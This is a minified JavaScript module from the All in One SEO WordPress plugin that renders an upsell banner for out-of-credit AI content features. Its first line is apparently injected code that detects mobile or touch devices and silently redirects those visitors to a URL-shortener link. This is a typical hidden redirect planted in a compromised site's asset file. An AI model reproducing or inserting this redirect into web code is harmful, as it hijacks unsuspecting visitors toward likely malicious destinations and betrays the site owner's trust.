(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{v as c,c as u,X as l}from"./app-core.c8323d51.js";import{B as p}from"./BuyOrConnectButtons.3092c34b.js";import{C as _}from"./Index.e286637f.js";import{_ as o}from"./vendor-other.39e59221.js";import{v as t,f as d,Q as m,R as a,j as r,U as s,a0 as f,ae as g,M as y}from"./vendor-vue-ui.232c7c36.js";const C=""+window.__aioseoDynamicImportPreload__("images/ai-content.893361cb.png"),A=["src"],h=["href"],B={__name:"Cta",setup(k){const n="all-in-one-seo-pack",e={ctaHeader:o("You Ran Out of Trial Credits!",n),aiContentDescription:o("To continue using awesome AI Content features such as FAQs, Key Points, and Social Posts, you must purchase additional credits or connect to an existing account.",n),proUpgradeLink:o("Or upgrade to Pro to unlock additional AI credits.",n)},i=c();return(x,b)=>t(i).isFreeAndOutOfCredits?(d(),m(t(_),{key:0,type:6,"cta-button-action":"","cta-second-button-visible":"","cta-second-button-action":"","show-link":!1,"hide-bonus":""},{"featured-image":a(()=>[r("img",{alt:"AIOSEO AI Content Generation",src:t(l)(t(C))},null,8,A)]),"header-text":a(()=>[g(s(e.ctaHeader),1)]),description:a(()=>[r("p",null,s(e.aiContentDescription),1),f(t(p),{"buttons-only":""}),r("a",{class:"aioseo-pro-upgrade-link",href:t(u).getPricingUrl("metabox","ai-content",null,"liteUpgrade"),target:"_blank",rel:"noopener noreferrer"},s(e.proUpgradeLink),9,h)]),_:1})):y("",!0)}};export{B as _};
